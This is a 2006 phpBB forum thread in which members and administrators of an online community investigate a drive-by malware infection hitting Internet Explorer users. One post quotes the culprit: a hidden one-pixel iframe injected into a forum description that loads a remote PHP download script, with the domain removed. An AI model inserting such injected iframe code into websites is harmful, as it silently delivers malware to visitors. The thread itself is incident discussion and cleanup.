| |
andrew247
Feel the Power
Joined: 18 Oct 2005
Location: c:\GoogleCommunity
88888.75 GC$
Items
|
 Posted: Thu Feb 09, 2006 10:42 am Post subject: |
 |
|
|
| cysite wrote: |  i have zone alarm it deleted it instantly. i think the ad has a virus in it. |
The advertisements are now gone....phew!
Hopefully the other sites which display those ads will also be warned of this nasty piece of programming, before it's too late. It's a shame what the web's coming to. 
_________________
Football Rumours | Gloog |
|
| Back to top |
|
|
mondine
Site Admin
Joined: 15 Sep 2005
Location: Vancouver, BC.
171655.40 GC$
Items
|
| Posted: Thu Feb 09, 2006 1:51 pm Post subject: |
|
|
|
Yeah, I still don't know what the deal is on this. My programs still see at least the name of the malware on a frame.
But with a patched OS, and running Firefox with NoScript and AdBlock, it's harder to find a malicious scipt, than it is to avoid it.
I think it would be more of a problem for some people at work, who 'leave these things to the IT guys'.
Edit:
I spoke too soon. (or too late.) It does seem to be gone, now. 
_________________
 |
|
| Back to top |
|
|
andrew247
Feel the Power
Joined: 18 Oct 2005
Location: c:\GoogleCommunity
88888.75 GC$
Items
|
| Posted: Thu Feb 09, 2006 2:29 pm Post subject: |
|
|
|
Bad news....it just downloaded onto my computer (the other on in my house, and I had trouble deleting it and closing the window Sadly, it seems the thing is back 
P.S. I got it removed thought
_________________
Football Rumours | Gloog |
|
| Back to top |
|
|
mondine
Site Admin
Joined: 15 Sep 2005
Location: Vancouver, BC.
171655.40 GC$
Items
|
| Posted: Thu Feb 09, 2006 2:51 pm Post subject: |
|
|
|
Yeah, I guess it wasn't gone. I had looked at NoScript, and the name of the frame was displayed as "about blank".
But then I realized that it was just being caught by AdBlock:
_________________
|
|
| Back to top |
|
|
cysite
MOTY 2005
Joined: 25 Jan 2005
Location: Virginia
21719.00 GC$
Items
|
| Posted: Thu Feb 09, 2006 8:03 pm Post subject: |
|
|
|
the virus is still here.... now i can only post on my ppc because it cant get the virus. pleez remove the virus fast! i hate posting from my ppc
_________________
my forums and web shop^^ |
|
| Back to top |
|
|
mondine
Site Admin
Joined: 15 Sep 2005
Location: Vancouver, BC.
171655.40 GC$
Items
|
| Posted: Thu Feb 09, 2006 8:43 pm Post subject: |
|
|
|
You could just stop using Internet Exploiter.
Just one more reason to use Firefox.
_________________
|
|
| Back to top |
|
|
intelliot
Site Admin
Joined: 01 May 2004
18653.45 GC$
Items
|
| Posted: Thu Feb 09, 2006 9:30 pm Post subject: |
|
|
|
Wow. I am really shocked and disgusted. I always use Firefox, so I didn't encounter this problem.
As soon as I opened Internet Explorer and visited GoogleCommunity.com, the virus appeared and messed up all sorts of things. It caused no permanent damage, but it was very annoying nonetheless.
This sort of thing could be very harmful to our good reputation. I always try to do my best to serve my visitors. I have no idea how this virus got onto this site.
I found the source of it: some iframe code was inserted in the Google as an Investment forum description:
| Code: | | Discuss the upcoming initial <iframe src="http://(domain removed)/dl/adv593.php" width=1 height=1></iframe> public... |
How did that get there? Only an Administrator can edit forum descriptions, unless the database was compromised. I will post a public apology and explanation in the Announcements forum.
_________________
Google Search blog |
|
| Back to top |
|
|
mondine
Site Admin
Joined: 15 Sep 2005
Location: Vancouver, BC.
171655.40 GC$
Items
|
| Posted: Thu Feb 09, 2006 9:42 pm Post subject: |
|
|
|
That's where it was? In a forum description?
That is quite disturbing. I hope we can find out how this happened, and soon.
But I'm glad you managed to find, and remove it.
_________________
|
|
| Back to top |
|
|
cysite
MOTY 2005
Joined: 25 Jan 2005
Location: Virginia
21719.00 GC$
Items
|
| Posted: Fri Feb 10, 2006 8:00 am Post subject: |
|
|
|
gosh im glad you fixed it! i almost stopped comming to Google community!!
_________________
my forums and web shop^^ |
|
| Back to top |
|
|
mondine
Site Admin
Joined: 15 Sep 2005
Location: Vancouver, BC.
171655.40 GC$
Items
|
| Posted: Fri Feb 10, 2006 8:15 am Post subject: |
|
|
|
Well, we couldn't have that, now.
After this happened, I did a little research, and was really quite surprised at how many black-hat sites were pumping this crap out, and at the number of forums that have taken a hit.
If it was a coding vulnerability, there is most likely already a patch for it.
It's just easy too forget that people still use buggy browsers that never met a script they didn't like.
But I think everyone was pretty shocked, and will work hard to do whatever it takes to see that it won't happen again.
We can't be losing our "Member of the Year" candidate, now, can we?
_________________
|
|
| Back to top |
|
|
andrew247
Feel the Power
Joined: 18 Oct 2005
Location: c:\GoogleCommunity
88888.75 GC$
Items
|
| Posted: Fri Feb 10, 2006 9:05 am Post subject: |
|
|
|
| intelliot wrote: |
unless the database was compromised |
That sounds very comforting 
_________________
Football Rumours | Gloog |
|
| Back to top |
|
|
Randy
Former Moderator
Joined: 17 Jun 2004
18197.20 GC$
Items
|
| Posted: Fri Feb 10, 2006 6:35 pm Post subject: |
|
|
|
Like most others, I didn't experience this issue either because I am using Firefox or Opera. However, it is very discomforting to know that someone trying to do bad things has access to the GC database. How on earth does an iframe script get into a forum description without an administrator explicitly putting it there?
Last edited by Randy on Fri Feb 10, 2006 9:33 pm; edited 1 time in total |
|
| Back to top |
|
|
mondine
Site Admin
Joined: 15 Sep 2005
Location: Vancouver, BC.
171655.40 GC$
Items
|
| Posted: Fri Feb 10, 2006 6:48 pm Post subject: |
|
|
|
What version of phpbb is used here?
I was hunting around last night, and the only thing I saw that looked like a similar issue was this bug.
_________________
|
|
| Back to top |
|
|
Randy
Former Moderator
Joined: 17 Jun 2004
18197.20 GC$
Items
|
| Posted: Fri Feb 10, 2006 6:51 pm Post subject: |
|
|
|
| mondine wrote: | What version of phpbb is used here?
I was hunting around last night, and the only thing I saw that looked like a similar issue was this bug. |
Good find. I have a strong suspicion that somebody needs to do some security updating. One of my pet peeves is not having software up to date (most importantly software that can cause security issues). |
|
| Back to top |
|
|
andrew247
Feel the Power
Joined: 18 Oct 2005
Location: c:\GoogleCommunity
88888.75 GC$
Items
|
| Posted: Sat Feb 11, 2006 4:53 am Post subject: |
|
|
|
| mondine wrote: | What version of phpbb is used here?
I was hunting around last night, and the only thing I saw that looked like a similar issue was this bug. |
Is that bug not just for inside topics? How can a [url] tag be used to change the index page? And if it was, would it not be noticable in the culprit thread that there was some hacking attempt going on?
_________________
Football Rumours | Gloog |
|
| Back to top |
|
|
Sponsored Links
|
| Posted: 6 Jan 2009 5:33 pm Post subject: Advertisements |
|
|
|
|
|
|
| Back to top |
|
|
